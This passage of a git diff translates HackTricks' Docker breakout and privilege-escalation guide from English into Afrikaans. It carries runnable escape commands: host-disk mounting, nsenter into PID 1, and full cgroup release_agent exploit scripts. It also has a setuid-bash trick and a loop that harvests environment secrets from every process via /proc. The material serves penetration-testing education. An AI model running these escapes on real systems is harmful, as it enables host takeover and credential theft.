displaying total CPU time consumed, helpful for tracking usage across a service's subprocesses: +
CPU-gebruikstatistieke soos vertoon in die cpu.stat lêer
-
CPU usage statistics as shown in the cpu.stat file
- -## References -* **Book: How Linux Works, 3rd Edition: What Every Superuser Should Know By Brian Ward** +## Verwysings +* **Boek: How Linux Works, 3rd Edition: What Every Superuser Should Know deur Brian Ward**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index 0766cc0dc..ea37e216f 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md @@ -1,48 +1,45 @@ -# Docker Breakout / Privilege Escalation +# Docker Uitbreek / Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **werkstrome outomatiseer** met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Automatic Enumeration & Escape +## Outomatiese Opsomming & Ontsnapping -* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers** -* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically** -* [**amicontained**](https://github.com/genuinetools/amicontained): Useful tool to get the privileges the container has in order to find ways to escape from it -* [**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers -* [**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image +* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): Dit kan ook **houers opsom** +* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): Hierdie instrument is baie **nuttig om die houer waarin jy is op te som, selfs om outomaties te probeer ontsnap** +* [**amicontained**](https://github.com/genuinetools/amicontained): Nuttige instrument om die voorregte van die houer te kry om maniere te vind om daaruit te ontsnap +* [**deepce**](https://github.com/stealthcopter/deepce): Instrument om houers op te som en daaruit te ontsnap +* [**grype**](https://github.com/anchore/grype): Kry die CVE's wat in die sagteware geïnstalleer in die beeld bevat word -## Mounted Docker Socket Escape - -If somehow you find that the **docker socket is mounted** inside the docker container, you will be able to escape from it.\ -This usually happen in docker containers that for some reason need to connect to docker daemon to perform actions. +## Ontsnapping van Gemoniteerde Docker-sokkel +As jy op een of ander manier vind dat die **docker-sokkel gemoniteer** is binne die docker-houer, sal jy daaruit kan ontsnap.\ +Dit gebeur gewoonlik in docker-houers wat om een of ander rede moet koppel aan die docker-daemon om aksies uit te voer. ```bash #Search the socket find / -name docker.sock 2>/dev/null #It's usually in /run/docker.sock ``` - -In this case you can use regular docker commands to communicate with the docker daemon: - +In hierdie geval kan jy gewone docker-opdragte gebruik om met die docker daemon te kommunikeer: ```bash #List images to use one docker images @@ -56,15 +53,14 @@ nsenter --target 1 --mount --uts --ipc --net --pid -- bash # Get full privs in container without --privileged docker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash ``` - {% hint style="info" %} -In case the **docker socket is in an unexpected place** you can still communicate with it using the **`docker`** command with the parameter **`-H unix:///path/to/docker.sock`** +In die geval dat die **docker sokket op 'n onverwagte plek** is, kan jy steeds daarmee kommunikeer deur die **`docker`** bevel te gebruik met die parameter **`-H unix:///path/to/docker.sock`** {% endhint %} -Docker daemon might be also [listening in a port (by default 2375, 2376)](../../../../network-services-pentesting/2375-pentesting-docker.md) or on Systemd-based systems, communication with the Docker daemon can occur over the Systemd socket `fd://`. +Die Docker daemon kan ook [luister op 'n poort (standaard 2375, 2376)](../../../../network-services-pentesting/2375-pentesting-docker.md) of op Systemd-gebaseerde stelsels kan kommunikasie met die Docker daemon plaasvind oor die Systemd sokket `fd://`. {% hint style="info" %} -Additionally, pay attention to the runtime sockets of other high-level runtimes: +Daarbenewens, let op die uitvoeringsokkels van ander hoëvlak-uitvoeringsomgewings: * dockershim: `unix:///var/run/dockershim.sock` * containerd: `unix:///run/containerd/containerd.sock` @@ -74,25 +70,23 @@ Additionally, pay attention to the runtime sockets of other high-level runtimes: * ... {% endhint %} -## Capabilities Abuse Escape +## Misbruik van Bevoegdhede Ontsnapping -You should check the capabilities of the container, if it has any of the following ones, you might be able to scape from it: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE, CAP_SYS_RAWIO`, `CAP_SYSLOG`, `CAP_NET_RAW`, `CAP_NET_ADMIN`** - -You can check currently container capabilities using **previously mentioned automatic tools** or: +Jy moet die bevoegdhede van die houer nagaan, as dit een van die volgende het, kan jy daaruit ontsnap: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE, CAP_SYS_RAWIO`, `CAP_SYSLOG`, `CAP_NET_RAW`, `CAP_NET_ADMIN`** +Jy kan die huidige bevoegdhede van die houer nagaan deur die **voorheen genoemde outomatiese gereedskap** of: ```bash capsh --print ``` - -In the following page you can **learn more about linux capabilities** and how to abuse them to escape/escalate privileges: +In die volgende bladsy kan jy **meer leer oor Linux-vermoëns** en hoe om dit te misbruik om voorregte te ontsnap/verhoog: {% content-ref url="../../linux-capabilities.md" %} [linux-capabilities.md](../../linux-capabilities.md) {% endcontent-ref %} -## Escape from Privileged Containers +## Ontsnap uit Bevoorregte Houers -A privileged container can be created with the flag `--privileged` or disabling specific defenses: +'n Bevoorregte houer kan geskep word met die vlag `--privileged` of deur spesifieke verdedigings uit te skakel: * `--cap-add=ALL` * `--security-opt apparmor=unconfined` @@ -104,51 +98,44 @@ A privileged container can be created with the flag `--privileged` or disabling * `--cgroupns=host` * `Mount /dev` -The `--privileged` flag significantly lowers container security, offering **unrestricted device access** and bypassing **several protections**. For a detailed breakdown, refer to the documentation on `--privileged`'s full impacts. +Die `--privileged` vlag verminder aansienlik die veiligheid van die houer, deur **ongeoorloofde toegang tot toestelle** te bied en **verskeie beskermings te omseil**. Vir 'n gedetailleerde uiteensetting, verwys na die dokumentasie oor die volle impakte van `--privileged`. {% content-ref url="../docker-privileged.md" %} [docker-privileged.md](../docker-privileged.md) {% endcontent-ref %} -### Privileged + hostPID +### Bevoorregte + hostPID -With these permissions you can just **move to the namespace of a process running in the host as root** like init (pid:1) just running: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash` - -Test it in a container executing: +Met hierdie toestemmings kan jy net **beweeg na die naamruimte van 'n proses wat as root in die gasheer hardloop**, soos init (pid:1), deur net die volgende uit te voer: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash` +Toets dit in 'n houer deur die volgende uit te voer: ```bash docker run --rm -it --pid=host --privileged ubuntu bash ``` +### Bevoorreg -### Privileged - -Just with the privileged flag you can try to **access the host's disk** or try to **escape abusing release\_agent or other escapes**. - -Test the following bypasses in a container executing: +Net met die bevoorregte vlag kan jy probeer om **toegang tot die gasheer se skyf** te verkry of probeer om te **ontsnap deur misbruik te maak van release\_agent of ander ontsnappings**. +Toets die volgende omseilings in 'n houer uit te voer: ```bash docker run --rm -it --privileged ubuntu bash ``` +#### Monteer Disk - Poc1 -#### Mounting Disk - Poc1 - -Well configured docker containers won't allow command like **fdisk -l**. However on miss-configured docker command where the flag `--privileged` or `--device=/dev/sda1` with caps is specified, it is possible to get the privileges to see the host drive. +Goed geconfigureerde Docker-houders sal nie opdragte soos **fdisk -l** toelaat nie. Tog, op 'n verkeerd gekonfigureerde Docker-opdrag waar die vlag `--privileged` of `--device=/dev/sda1` met kapasiteit gespesifiseer word, is dit moontlik om die voorregte te verkry om die gasheer-aandrywing te sien. ![](https://bestestredteam.com/content/images/2019/08/image-16.png) -So to take over the host machine, it is trivial: - +Om dus die gasheer-rekenaar oor te neem, is dit eenvoudig: ```bash mkdir -p /mnt/hola mount /dev/sda1 /mnt/hola ``` +En voilà! Jy kan nou toegang verkry tot die lêersisteem van die gasheer omdat dit in die `/mnt/hola`-vouer gemoniteer is. -And voilà ! You can now access the filesystem of the host because it is mounted in the `/mnt/hola` folder. - -#### Mounting Disk - Poc2 - -Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector: +#### Monteer Disk - Poc2 +Binne die houer kan 'n aanvaller probeer om verdere toegang tot die onderliggende gasheer-bedryfstelsel te verkry deur 'n skryfbare hostPath-volume wat deur die groep geskep is. Hieronder is 'n paar algemene dinge wat jy binne die houer kan nagaan om te sien of jy hierdie aanvallervektor kan benut: ```bash ### Check if You Can Write to a File-system echo 1 > /proc/sysrq-trigger @@ -169,10 +156,9 @@ mount: /mnt: permission denied. ---> Failed! but if not, you may have access to ### debugfs (Interactive File System Debugger) debugfs /dev/sda1 ``` +#### Bevoorregte Ontsnapping deur gebruik te maak van bestaande release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC1 -#### Privileged Escape Abusing existent release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC1 - -{% code title="Initial PoC" %} +{% code title="Aanvanklike PoC" %} ```bash # spawn a new container to exploit via: # docker run --rm -it --privileged ubuntu bash @@ -208,9 +194,9 @@ cat /o ``` {% endcode %} -#### Privileged Escape Abusing created release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC2 +#### Bevoorregte Ontsnapping deur die skepping van 'n release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC2 -{% code title="Second PoC" %} +{% code title="Tweede PoC" %} ```bash # On the host docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash @@ -246,7 +232,7 @@ chmod a+x /cmd # Executes the attack by spawning a process that immediately ends inside the "x" child cgroup # By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory -# The script on the host will execute after /bin/sh exits +# The script on the host will execute after /bin/sh exits sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output @@ -254,20 +240,19 @@ cat /output ``` {% endcode %} -Find an **explanation of the technique** in: +Vind 'n **verduideliking van die tegniek** in: {% content-ref url="docker-release_agent-cgroups-escape.md" %} [docker-release\_agent-cgroups-escape.md](docker-release\_agent-cgroups-escape.md) {% endcontent-ref %} -#### Privileged Escape Abusing release\_agent without known the relative path - PoC3 +#### Bevoorregte Ontsnapping deur release\_agent te misbruik sonder om die relatiewe pad te ken - PoC3 -In the previous exploits the **absolute path of the container inside the hosts filesystem is disclosed**. However, this isn’t always the case. In cases where you **don’t know the absolute path of the container inside the host** you can use this technique: +In die vorige aanvalle word die **absoluut pad van die houer binne die gasheer se lêersisteem bekend gemaak**. Dit is egter nie altyd die geval nie. In gevalle waar jy **nie die absoluut pad van die houer binne die gasheer ken nie** kan jy hierdie tegniek gebruik: {% content-ref url="release_agent-exploit-relative-paths-to-pids.md" %} [release\_agent-exploit-relative-paths-to-pids.md](release\_agent-exploit-relative-paths-to-pids.md) {% endcontent-ref %} - ```bash #!/bin/sh @@ -306,20 +291,20 @@ echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release TPID=1 while [ ! -f ${OUTPUT_PATH} ] do - if [ $((${TPID} % 100)) -eq 0 ] - then - echo "Checking pid ${TPID}" - if [ ${TPID} -gt ${MAX_PID} ] - then - echo "Exiting at ${MAX_PID} :-(" - exit 1 - fi - fi - # Set the release_agent path to the guessed pid - echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent - # Trigger execution of the release_agent - sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" - TPID=$((${TPID} + 1)) +if [ $((${TPID} % 100)) -eq 0 ] +then +echo "Checking pid ${TPID}" +if [ ${TPID} -gt ${MAX_PID} ] +then +echo "Exiting at ${MAX_PID} :-(" +exit 1 +fi +fi +# Set the release_agent path to the guessed pid +echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent +# Trigger execution of the release_agent +sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" +TPID=$((${TPID} + 1)) done # Wait for and cat the output @@ -327,9 +312,7 @@ sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH} ``` - -Executing the PoC within a privileged container should provide output similar to: - +Die uitvoering van die PoC binne 'n bevoorregte houer moet 'n uitset gee wat soortgelyk is aan: ```bash root@container:~$ ./release_agent_pid_brute.sh Checking pid 100 @@ -357,37 +340,33 @@ root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq] root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0] ... ``` +#### Bevoorregte Ontsnapping deur Misbruik van Sensitiewe Monteerplekke -#### Privileged Escape Abusing Sensitive Mounts +Daar is verskeie lêers wat gemonteer kan word wat **inligting oor die onderliggende gasheer gee**. Sommige van hulle kan selfs **aandui dat iets deur die gasheer uitgevoer moet word wanneer iets gebeur** (wat 'n aanvaller in staat sal stel om uit die houer te ontsnap).\ +Die misbruik van hierdie lêers kan veroorsaak dat: -There are several files that might mounted that give **information about the underlaying host**. Some of them may even indicate **something to be executed by the host when something happens** (which will allow a attacker to escape from the container).\ -The abuse of these files may allow that: - -* release\_agent (already covered before) +* release\_agent (reeds voorheen gedek) * [binfmt\_misc](sensitive-mounts.md#proc-sys-fs-binfmt\_misc) * [core\_pattern](sensitive-mounts.md#proc-sys-kernel-core\_pattern) * [uevent\_helper](sensitive-mounts.md#sys-kernel-uevent\_helper) * [modprobe](sensitive-mounts.md#proc-sys-kernel-modprobe) -However, you can find **other sensitive files** to check for in this page: +Jy kan egter **ander sensitiewe lêers** vind om na te kyk op hierdie bladsy: {% content-ref url="sensitive-mounts.md" %} [sensitive-mounts.md](sensitive-mounts.md) {% endcontent-ref %} -### Arbitrary Mounts - -In several occasions you will find that the **container has some volume mounted from the host**. If this volume wasn’t correctly configured you might be able to **access/modify sensitive data**: Read secrets, change ssh authorized\_keys… +### Willekeurige Monteerplekke +In verskeie gevalle sal jy vind dat die **houer 'n volume van die gasheer gemonteer het**. As hierdie volume nie korrek gekonfigureer is nie, kan jy dalk **toegang verkry tot/wysiging maak aan sensitiewe data**: Lees geheime, verander ssh authorized\_keys... ```bash docker run --rm -it -v /:/host ubuntu bash ``` +### Voorregverhoging met 2 doppe en gasheer monteer -### Privilege Escalation with 2 shells and host mount - -If you have access as **root inside a container** that has some folder from the host mounted and you have **escaped as a non privileged user to the host** and have read access over the mounted folder.\ -You can create a **bash suid file** in the **mounted folder** inside the **container** and **execute it from the host** to privesc. - +As jy toegang het as **root binne 'n houer** wat 'n paar vouers van die gasheer gemonteer het en jy het **ontsnap as 'n nie-bevoorregte gebruiker na die gasheer** en het leestoegang oor die gemonteerde vouer.\ +Jy kan 'n **bash suid-lêer** skep in die **gemonteerde vouer** binne die **houer** en dit vanaf die gasheer **uitvoer** om voorregverhoging te bewerkstellig. ```bash cp /bin/bash . #From non priv inside mounted folder # You need to copy it from the host as the bash binaries might be diferent in the host and in the container @@ -395,16 +374,14 @@ chown root:root bash #From container as root inside mounted folder chmod 4777 bash #From container as root inside mounted folder bash -p #From non priv inside mounted folder ``` +### Voorregverhoging met 2 skulpe -### Privilege Escalation with 2 shells +As jy toegang het as **root binne 'n houer** en jy het **ontsnap as 'n nie-bevoorregte gebruiker na die gasheer**, kan jy beide skulpe misbruik om **voorregverhoging binne die gasheer** te bewerkstellig as jy die MKNOD-vermoë binne die houer het (dit is standaard) soos [**verduidelik in hierdie pos**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/).\ +Met so 'n vermoë word die root-gebruiker binne die houer toegelaat om **bloktoestel-lêers te skep**. Toestel-lêers is spesiale lêers wat gebruik word om **onderliggende hardeware- en kernmodules te benader**. Byvoorbeeld, die /dev/sda bloktoestel-lêer gee toegang om **die rou data op die stelsel se skyf te lees**. -If you have access as **root inside a container** and you have **escaped as a non privileged user to the host**, you can abuse both shells to **privesc inside the host** if you have the capability MKNOD inside the container (it's by default) as [**explained in this post**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/).\ -With such capability the root user within the container is allowed to **create block device files**. Device files are special files that are used to **access underlying hardware & kernel modules**. For example, the /dev/sda block device file gives access to **read the raw data on the systems disk**. - -Docker safeguards against block device misuse within containers by enforcing a cgroup policy that **blocks block device read/write operations**. Nevertheless, if a block device is **created inside the container**, it becomes accessible from outside the container via the **/proc/PID/root/** directory. This access requires the **process owner to be the same** both inside and outside the container. - -**Exploitation** example from this [**writeup**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/): +Docker beskerm teen misbruik van bloktoestelle binne houers deur 'n cgroup-beleid af te dwing wat **bloktoestel lees-/skryfhandelinge blokkeer**. Nietemin, as 'n bloktoestel **binne die houer geskep word**, word dit toeganklik van buite die houer via die **/proc/PID/root/** gids. Hierdie toegang vereis dat die **proses-eienaar dieselfde is** binne en buite die houer. +**Uitbuiting** voorbeeld van hierdie [**verslag**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/): ```bash # On the container as root cd / @@ -422,7 +399,7 @@ su: Authentication failure (Ignored) augustus@3a453ab39d3d:/backend$ /bin/sh /bin/sh -$ +$ ``` ```bash @@ -437,22 +414,18 @@ augustus 1661 0.0 0.0 6116 648 pts/0 S+ 09:48 0:00 \_ # The process ID is 1659 in this case # Grep for the sda for HTB{ through the process: -augustus@GoodGames:~$ grep -a 'HTB{' /proc/1659/root/sda +augustus@GoodGames:~$ grep -a 'HTB{' /proc/1659/root/sda HTB{7h4T_w45_Tr1cKy_1_D4r3_54y} ``` - ### hostPID -If you can access the processes of the host you are going to be able to access a lot of sensitive information stored in those processes. Run test lab: - +As jy toegang het tot die prosesse van die gasheer, sal jy toegang hê tot baie sensitiewe inligting wat in daardie prosesse gestoor word. Voer toetslaboratorium uit: ``` docker run --rm -it --pid=host ubuntu bash ``` +Byvoorbeeld, sal jy in staat wees om die prosesse te lys deur iets soos `ps auxn` te gebruik en te soek na sensitiewe besonderhede in die opdragte. -For example, you will be able to list the processes using something like `ps auxn` and search for sensitive details in the commands. - -Then, as you can **access each process of the host in /proc/ you can just steal their env secrets** running: - +Dan, aangesien jy **toegang het tot elke proses van die gasheer in /proc/, kan jy net hul omgewingsgeheime steel** deur die volgende uit te voer: ```bash for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done /proc/988058/environ @@ -461,9 +434,7 @@ HOSTNAME=argocd-server-69678b4f65-6mmql USER=abrgocd ... ``` - -You can also **access other processes file descriptors and read their open files**: - +Jy kan ook **toegang verkry tot ander prosesse se lêerbeskrywers en hul oop lêers lees**: ```bash for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \>; done > fds.txt less fds.txt @@ -473,89 +444,82 @@ lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp # You can open the secret filw with: cat /proc/635813/fd/4 ``` - -You can also **kill processes and cause a DoS**. +Jy kan ook **prosesse doodmaak en 'n DoS veroorsaak**. {% hint style="warning" %} -If you somehow have privileged **access over a process outside of the container**, you could run something like `nsenter --target --all` or `nsenter --target --mount --net --pid --cgroup` to **run a shell with the same ns restrictions** (hopefully none) **as that process.** +As jy op een of ander manier bevoorregte **toegang het tot 'n proses buite die houer**, kan jy iets soos `nsenter --target --all` of `nsenter --target --mount --net --pid --cgroup` hardloop om **'n skul met dieselfde ns-beperkings** (hopelik geen) **as daardie proses** uit te voer. {% endhint %} ### hostNetwork - ``` docker run --rm -it --network=host ubuntu bash ``` +As 'n houer gekonfigureer is met die Docker [host-netwerkbestuurder (`--network=host`)](https://docs.docker.com/network/host/), is daardie houer se netwerkstapel nie geïsoleer van die Docker-gashouer nie (die houer deel die gashouer se netwerk-namespace) en die houer kry nie sy eie IP-adres toegewys nie. Met ander woorde, die **houer bind alle dienste direk aan die gashouer se IP**. Verder kan die houer **ALLE netwerkverkeer onderskep wat die gashouer** stuur en ontvang op die gedeelde koppelvlak `tcpdump -i eth0`. -If a container was configured with the Docker [host networking driver (`--network=host`)](https://docs.docker.com/network/host/), that container's network stack is not isolated from the Docker host (the container shares the host's networking namespace), and the container does not get its own IP-address allocated. In other words, the **container binds all services directly to the host's IP**. Furthermore the container can **intercept ALL network traffic that the host** is sending and receiving on shared interface `tcpdump -i eth0`. +Byvoorbeeld, jy kan dit gebruik om verkeer tussen die gashouer en metadata-instansie **af te luister en selfs te vervals**. -For instance, you can use this to **sniff and even spoof traffic** between host and metadata instance. +Soos in die volgende voorbeelde: -Like in the following examples: +* [Writeup: Hoe om Google SRE te kontak: 'n Skulp in die wolk SQL laat val](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/) +* [Metadata-diens MITM maak wortelvoorregverhoging moontlik (EKS / GKE)](https://blog.champtar.fr/Metadata\_MITM\_root\_EKS\_GKE/) -* [Writeup: How to contact Google SRE: Dropping a shell in cloud SQL](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/) -* [Metadata service MITM allows root privilege escalation (EKS / GKE)](https://blog.champtar.fr/Metadata\_MITM\_root\_EKS\_GKE/) - -You will be able also to access **network services binded to localhost** inside the host or even access the **metadata permissions of the node** (which might be different those a container can access). +Jy sal ook in staat wees om toegang te verkry tot **netwerkdienste wat aan die localhost gebind is** binne die gashouer of selfs toegang te verkry tot die **metadata-permissies van die node** (wat verskillend kan wees as dié wat 'n houer kan verkry). ### hostIPC - ```bash docker run --rm -it --ipc=host ubuntu bash ``` +Met `hostIPC=true` kry jy toegang tot die gasheer se interproseskommunikasie (IPC) hulpbronne, soos **gedeelde geheue** in `/dev/shm`. Dit maak dit moontlik om te lees/skryf waar dieselfde IPC-hulpbronne deur ander gasheer- of houerprosesse gebruik word. Gebruik `ipcs` om hierdie IPC-meganismes verder te ondersoek. -With `hostIPC=true`, you gain access to the host's inter-process communication (IPC) resources, such as **shared memory** in `/dev/shm`. This allows reading/writing where the same IPC resources are used by other host or pod processes. Use `ipcs` to inspect these IPC mechanisms further. +* **Ondersoek /dev/shm** - Kyk vir enige lêers in hierdie gedeelde geheue-plek: `ls -la /dev/shm` +* **Ondersoek bestaande IPC-fasiliteite** - Jy kan nagaan of enige IPC-fasiliteite gebruik word met `/usr/bin/ipcs`. Kontroleer dit met: `ipcs -a` -* **Inspect /dev/shm** - Look for any files in this shared memory location: `ls -la /dev/shm` -* **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs`. Check it with: `ipcs -a` - -### Recover capabilities - -If the syscall **`unshare`** is not forbidden you can recover all the capabilities running: +### Herstel bevoegdhede +As die systoeproep **`unshare`** nie verbied is nie, kan jy al die bevoegdhede herstel deur die volgende uit te voer: ```bash unshare -UrmCpf bash # Check them with cat /proc/self/status | grep CapEff ``` +### Gebruikersnaamruimte-misbruik via symboliese koppeling -### User namespace abuse via symlink - -The second technique explained in the post [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files). +Die tweede tegniek wat in die berig [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) verduidelik word, dui aan hoe jy bindkoppeling met gebruikersnaamruimtes kan misbruik om lêers binne die gasheer te beïnvloed (in daardie spesifieke geval, lêers uitvee).
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## CVEs +## CVE's -### Runc exploit (CVE-2019-5736) +### Runc-uitbuiting (CVE-2019-5736) -In case you can execute `docker exec` as root (probably with sudo), you try to escalate privileges escaping from a container abusing CVE-2019-5736 (exploit [here](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). This technique will basically **overwrite** the _**/bin/sh**_ binary of the **host** **from a container**, so anyone executing docker exec may trigger the payload. +In die geval dat jy `docker exec` as root kan uitvoer (waarskynlik met sudo), kan jy probeer om voorregte te verhoog deur te ontsnap uit 'n houer wat misbruik maak van CVE-2019-5736 (uitbuiting [hier](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). Hierdie tegniek sal basies die _**/bin/sh**_ binêre lêer van die **gasheer** **oorvleuel** vanuit 'n houer, sodat enigeen wat docker exec uitvoer die nut kan aktiveer. -Change the payload accordingly and build the main.go with `go build main.go`. The resulting binary should be placed in the docker container for execution.\ -Upon execution, as soon as it displays `[+] Overwritten /bin/sh successfully` you need to execute the following from the host machine: +Verander die nut volgens jou behoeftes en bou die main.go met `go build main.go`. Die resulterende binêre lêer moet in die docker-houer geplaas word vir uitvoering.\ +By uitvoering, sodra dit `[+] Overwritten /bin/sh successfully` vertoon, moet jy die volgende vanaf die gasheermasjien uitvoer: -`docker exec 